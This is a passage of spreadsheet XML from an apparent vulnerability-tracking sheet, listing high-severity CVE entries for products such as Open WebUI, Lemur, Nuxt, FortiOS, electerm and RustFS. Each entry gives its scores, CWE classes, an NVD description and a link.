      <c r="K1866" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1866" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.0 until 0.11.0, when ENABLE_OAUTH_TOKEN_EXCHANGE=True, /oauth/{provider}/token/exchange accepts a raw provider access token and validates it by calling the provider userinfo endpoint without confirming which OAuth client the token was issued to. Anyone holding an access token minted for any client registered with the same provider could exchange it for an Open WebUI session as that token user, including applications the operator does not control and has never authorized. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70482</t>
        </is>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70494</t>
        </is>
      </c>
      <c r="C1867" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1867" s="5" t="inlineStr"/>
      <c r="F1867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1867" s="5" t="inlineStr"/>
      <c r="H1867" s="5" t="inlineStr"/>
      <c r="I1867" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1867" s="5" t="inlineStr"/>
      <c r="K1867" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L1867" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.0, the DELETE /api/v1/folders/{id} handler in backend/open_webui/routers/folders.py allowed a user granted write access to a shared chat folder to permanently delete chats and messages belonging to the folder owner. The cascade following the authorization check is bound to the folder owner's id, but the subfolder check accepted any inherited write grant instead of requiring ownership or administrator status. A collaborator can destroy the owner's subtree or force-move chats out of it when delete_contents=false. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70494</t>
        </is>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="C1868" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1868" s="5" t="inlineStr"/>
      <c r="F1868" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1868" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1868" s="5" t="inlineStr"/>
      <c r="I1868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1868" s="5" t="inlineStr"/>
      <c r="K1868" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1868" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71308</t>
        </is>
      </c>
      <c r="C1869" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1869" s="5" t="inlineStr"/>
      <c r="F1869" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1869" s="5" t="inlineStr"/>
      <c r="H1869" s="5" t="inlineStr"/>
      <c r="I1869" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1869" s="5" t="inlineStr"/>
      <c r="K1869" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L1869" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. From 0.5.0 until 1.9.3, certificate create, upload, and edit requests accepted replaces[] or replacements identifiers that AssociatedCertificateSchema resolved with fetch_objects without a CertificatePermission check. Assigning those objects to Certificate.replaces invoked an append listener that disabled the victim certificate notifications and marked it as replaced. The victim was then excluded from get_all_pending_reissue, and certificate_rotate could deploy the attacker certificate to endpoints serving the victim. An authenticated non-read-only user could target certificates for which the user had no ownership or role, suppress lifecycle automation, and cause fleet-wide TLS disruption or unauthorized substitution. The fix authorizes every referenced replacement certificate before mutation. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M1869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71308</t>
        </is>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71320</t>
        </is>
      </c>
      <c r="C1870" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1870" s="5" t="inlineStr"/>
      <c r="F1870" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1870" s="5" t="inlineStr"/>
      <c r="H1870" s="5" t="inlineStr"/>
      <c r="I1870" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1870" s="5" t="inlineStr"/>
      <c r="K1870" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="L1870" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.4.0 until 3.21.10 and 4.5.1, an attacker can inject a template key through /__nuxt_island/ props into a dynamic component when `vue.runtimeCompiler: true` is enabled, causing template execution in the Nitro process. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M1870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71320</t>
        </is>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71407</t>
        </is>
      </c>
      <c r="C1871" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1871" s="5" t="inlineStr"/>
      <c r="F1871" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1871" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1871" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios</t>
        </is>
      </c>
      <c r="I1871" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1871" s="5" t="inlineStr"/>
      <c r="K1871" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1871" s="5" t="inlineStr">
        <is>
          <t>A Stack-based Buffer Overflow vulnerability [CWE-121] vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6 may allow an unauthenticated attacker who can bypass stack protection and ASLR to execute arbitrary code or commands in the context of the WAD daemon via crafted sockets, only if the explicit proxy is configured with Kerberos authentication and SOCKS enabled.</t>
        </is>
      </c>
      <c r="M1871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71407</t>
        </is>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72903</t>
        </is>
      </c>
      <c r="C1872" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1872" s="5" t="inlineStr"/>
      <c r="F1872" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1872" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1872" s="5" t="inlineStr"/>
      <c r="I1872" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1872" s="5" t="inlineStr"/>
      <c r="K1872" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1872" s="5" t="inlineStr">
        <is>
          <t>Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.235, a malicious SFTP server can return a backslash traversal filename through entry.name. In tabby-ssh/src/session/sftp.ts, SFTPSession.readdir() and _makeFile() use POSIX path processing that preserves the backslashes as ordinary filename characters. In tabby-ssh/src/components/sftpPanel.component.ts, downloadFolderRecursive() propagates item.name into the local relative path. In tabby-electron/src/services/platform.service.ts, ElectronDirectoryDownload.createFile() passes that path to Windows-native path.join(), and in tabby-electron/src/sftpContextMenu.ts, EditSFTPContextMenu.edit() passes item.name to path.join() for the temporary edit path. Windows interprets the preserved backslashes and parent-directory components as traversal, allowing attacker-controlled content to be created or overwritten outside the selected download directory or temporary edit directory. This issue is fixed in version 1.0.235.</t>
        </is>
      </c>
      <c r="M1872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72903</t>
        </is>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72921</t>
        </is>
      </c>
      <c r="C1873" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1873" s="5" t="inlineStr"/>
      <c r="F1873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1873" s="5" t="inlineStr"/>
      <c r="H1873" s="5" t="inlineStr"/>
      <c r="I1873" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1873" s="5" t="inlineStr"/>
      <c r="K1873" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1873" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, the weed/server/filer_server_handlers.go allowed_prefixes authorization check used strings.HasPrefix on raw path strings, so a filer JWT scoped to /tenant1 also authorized sibling paths such as /tenant1234, /tenant1-old, and /tenant1backup, enabling cross-tenant reads and writes with a valid scoped token. This issue is fixed in version 4.24.</t>
        </is>
      </c>
      <c r="M1873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72921</t>
        </is>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="C1874" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1874" s="5" t="inlineStr"/>
      <c r="F1874" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1874" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1874" s="5" t="inlineStr"/>
      <c r="I1874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1874" s="5" t="inlineStr"/>
      <c r="K1874" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1874" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72981</t>
        </is>
      </c>
      <c r="C1875" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1875" s="5" t="inlineStr"/>
      <c r="F1875" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1875" s="5" t="inlineStr"/>
      <c r="H1875" s="5" t="inlineStr"/>
      <c r="I1875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1875" s="5" t="inlineStr"/>
      <c r="K1875" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1875" s="5" t="inlineStr">
        <is>
          <t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t>
        </is>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="C1876" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1876" s="5" t="inlineStr"/>
      <c r="F1876" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1876" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1876" s="5" t="inlineStr"/>
      <c r="I1876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1876" s="5" t="inlineStr"/>
      <c r="K1876" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1876" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73223</t>
        </is>
      </c>
      <c r="C1877" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1877" s="5" t="inlineStr"/>
      <c r="F1877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1877" s="5" t="inlineStr"/>
      <c r="H1877" s="5" t="inlineStr"/>
      <c r="I1877" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1877" s="5" t="inlineStr"/>
      <c r="K1877" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1877" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious SFTP server to write attacker-controlled content outside the temporary directory because the server-controlled filename name used by editWithSystemEditor in src/client/components/sftp/file-item.jsx is interpolated into path.resolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73223</t>
        </is>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73225</t>
        </is>
      </c>
      <c r="C1878" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1878" s="5" t="inlineStr"/>
      <c r="F1878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1878" s="5" t="inlineStr"/>
      <c r="H1878" s="5" t="inlineStr"/>
      <c r="I1878" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1878" s="5" t="inlineStr"/>
      <c r="K1878" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1878" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious FTP or SFTP server to write attacker-controlled content outside the selected download directory because recursive transfers in src/client/components/file-transfer/transfer.jsx pass server-supplied file.name and folder.name values to resolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73225</t>
        </is>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73227</t>
        </is>
      </c>
      <c r="C1879" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1879" s="5" t="inlineStr"/>
      <c r="F1879" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1879" s="5" t="inlineStr"/>
      <c r="H1879" s="5" t="inlineStr"/>
      <c r="I1879" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1879" s="5" t="inlineStr"/>
      <c r="K1879" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1879" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious RDP server to write attacker-controlled content outside the selected save directory because the RDP clipboard download path in src/client/components/rdp/file-transfer.js passes the server-controlled CLIPRDR filename fileInfo.name to osResolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73227</t>
        </is>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73286</t>
        </is>
      </c>
      <c r="C1880" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1880" s="5" t="inlineStr"/>
      <c r="F1880" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1880" s="5" t="inlineStr"/>
      <c r="H1880" s="5" t="inlineStr"/>
      <c r="I1880" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1880" s="5" t="inlineStr"/>
      <c r="K1880" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1880" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, RustFS get_condition_values folds attacker-controlled request headers from HeaderMap into server-derived userid, username, principaltype, groups, versionid, signatureversion, jwt:, and ldap: condition keys, allowing authenticated callers to satisfy identity-based policy conditions. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M1880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73286</t>
        </is>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73289</t>
        </is>
      </c>
      <c r="C1881" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1881" s="5" t="inlineStr"/>
      <c r="F1881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1881" s="5" t="inlineStr"/>
      <c r="H1881" s="5" t="inlineStr"/>
      <c r="I1881" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1881" s="5" t="inlineStr"/>
      <c r="K1881" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1881" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, RustFS evaluates the ForAllValues: and ForAnyValue: set qualifiers with the negated string operators StringNotEquals, StringNotEqualsIgnoreCase, StringNotLike, ArnNotEquals, and ArnNotLike using each other's semantics because crates/policy/src/policy/function/string.rs negates the aggregate result after eval or eval_like instead of negating each request-value predicate before quantification. Partially overlapping policy and request value sets can therefore make an Allow condition grant access to an excluded principal or make a Deny guardrail fail, including policies based on jwt:groups and jwt:roles; absent keys also receive the opposite ForAllValues: and ForAnyValue: behavior. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M1881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73289</t>
        </is>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73334</t>
        </is>
      </c>
      <c r="C1882" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1882" s="5" t="inlineStr"/>
      <c r="F1882" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1882" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1882" s="5" t="inlineStr">
        <is>
          <t>apache:parquet</t>
        </is>
      </c>
      <c r="I1882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1882" s="5" t="inlineStr"/>
      <c r="K1882" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1882" s="5" t="inlineStr">
        <is>
          <t>Potential problem for users of the org.apache.parquet.crypto.keytools package in Apache Parquet, versions 1.12 to 1.18. 
This package enables users to encrypt Parquet files via an envelope encryption mechanism that wraps (encrypts) data keys via a Key Management Service (KMS). 
On the reader side, the KMS URL can be application-controlled or file-controlled.
If the user does not leverage application control for this parameter, a file-controlled KMS URL is forwarded to a pluggable KmsClient implementation. 
If the pluggable implementation does not perform host validation, a KMS token can be sent to a malicious host set by an attacker in the file.
Before the problem is fixed, users are recommended to leverage application control for KMS URL parameter in readers (versions 1.12-1.18).
After the problem is fixed (presumably in version 1.19), the upgrade will disable file-controlled KMS URL by default. Users of the KMS URL parameter 
will have two options then: leverage application control for KMS URL parameter in readers, or enable file-controlled KMS URL (via a new app parameter).
The latter option will explicitly require (in the new parameter documentation) to validate the KMS URL and use authentication in the custom implementation of the KMS client plug in.</t>
        </is>
      </c>
      <c r="M1882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73334</t>
        </is>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73659</t>
        </is>
      </c>
      <c r="C1883" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1883" s="5" t="inlineStr"/>
      <c r="F1883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1883" s="5" t="inlineStr"/>
      <c r="H1883" s="5" t="inlineStr"/>
      <c r="I1883" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1883" s="5" t="inlineStr"/>
      <c r="K1883" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1883" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev is the open-source platform for building AI workflows in TypeScript. From 4.4.2 until 4.5.0, the packet presign routes in apps/webapp/app/routes/api.v1.packets.$.ts pass a caller-controlled filename through resolveStoreProtocolForPacketPresign to generatePresignedUrl and generatePresignedRequest in apps/webapp/app/v3/objectStore.server.ts, allowing .. traversal to escape the packets/&lt;projectRef&gt;/&lt;env&gt;/ object-store prefix and enabling a project API key to read or overwrite another organization's offloaded task payloads and outputs on multi-organization self-hosted instances. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73659</t>
        </is>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="C1884" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1884" s="5" t="inlineStr"/>
      <c r="F1884" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1884" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1884" s="5" t="inlineStr"/>
      <c r="I1884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1884" s="5" t="inlineStr"/>
      <c r="K1884" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="L1884" s="5" t="inlineStr">
        <is>
          <t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t>
        </is>
      </c>
      <c r="M1884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75464</t>
        </is>
      </c>
      <c r="C1885" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1885" s="5" t="inlineStr"/>
      <c r="F1885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1885" s="5" t="inlineStr"/>
      <c r="H1885" s="5" t="inlineStr"/>
      <c r="I1885" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1885" s="5" t="inlineStr"/>
      <c r="K1885" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L1885" s="5" t="inlineStr">
        <is>
          <t>OneNav 1.2.4 contains an authenticated arbitrary file deletion vulnerability via import_link().</t>
        </is>
      </c>
      <c r="M1885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75464</t>
        </is>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76009</t>
        </is>
      </c>
      <c r="C1886" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1886" s="5" t="inlineStr"/>
      <c r="F1886" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1886" s="5" t="inlineStr"/>
      <c r="H1886" s="5" t="inlineStr"/>
      <c r="I1886" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1886" s="5" t="inlineStr"/>
      <c r="K1886" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1886" s="5" t="inlineStr">
        <is>
